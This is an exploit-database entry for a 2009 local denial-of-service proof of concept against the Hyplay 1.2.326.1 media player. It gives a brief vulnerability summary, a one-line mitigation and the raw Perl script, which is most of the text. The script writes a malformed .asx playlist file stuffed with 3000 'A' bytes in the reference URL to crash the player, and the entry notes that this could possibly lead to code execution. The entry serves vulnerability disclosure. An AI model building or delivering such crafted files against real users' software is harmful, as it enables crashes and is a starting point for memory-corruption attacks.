Hyplay 1.2.326.1 (.asx) Local DoS crash PoC

vendor:

Hyplay

by:

xsploited Security

7,5

CVSS

HIGH

Denial of Service (DoS)

CWE

Product Name: Hyplay

Affected Version From: 1.2.326.1

Affected Version To: 1.2.326.1

Patch Exists: NO

Related CWE: N/A

CPE: //a:hyplay

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP2

2009

Hyplay 1.2.326.1 (.asx) Local DoS crash PoC

A bug exists in the way Hyplay processes malformed .asx play list files. This could potentially lead to code execution on the users machine. An evil asx file is created with 3000 bytes of 'A' characters which can cause a denial of service crash.

Mitigation:

Ensure that all .asx files are validated before processing.

Source

Exploit-DB raw data:

#/usr/bin/perl
#Title: Hyplay 1.2.326.1 (.asx) Local DoS crash PoC
#Download: http://www.hyplay.com/download.asp
#Written/Discovered by: xsploited Security
#Tested on Windows XP SP2
#URL: http://x-sploited.com/
#Shoutz: kAoTiX, drizzle, JeremyBrown, BreTT, Deca

#A bug exists in the way Hyplay processes malformed .asx play 
#list files. This could potentially lead to code execution on 
#the users machine.

my $data1=   
"\x3C\x61\x73\x78\x20\x76\x65\x72\x73\x69\x6F\x6E\x20\x3D\x20".
"\x22\x33\x2E\x30\x22\x20\x3E\x0D\x0D\x0A\x3C\x65\x6E\x74\x72".
"\x79\x3E\x0D\x0D\x0A".
"\x3C\x72\x65\x66\x20\x68\x72\x65\x66\x20\x3D\x20\x22";

my $data2="http://"; 

my $data3= #asx file footer
"\x22\x20\x2F\x3E\x0D\x0A\x3C\x2F\x65\x6E\x74\x72\x79\x3E\x0D".
"\x0A\x3C\x2F\x61\x73\x78\x3E";

my $junk = "\x41" x 3000;
open(my $playlist, "> hyplay_d0s.asx");
print $playlist $data1.$data2.$junk.$data3."\r\n";
close $playlist;
print "\nEvil asx file created successfully.";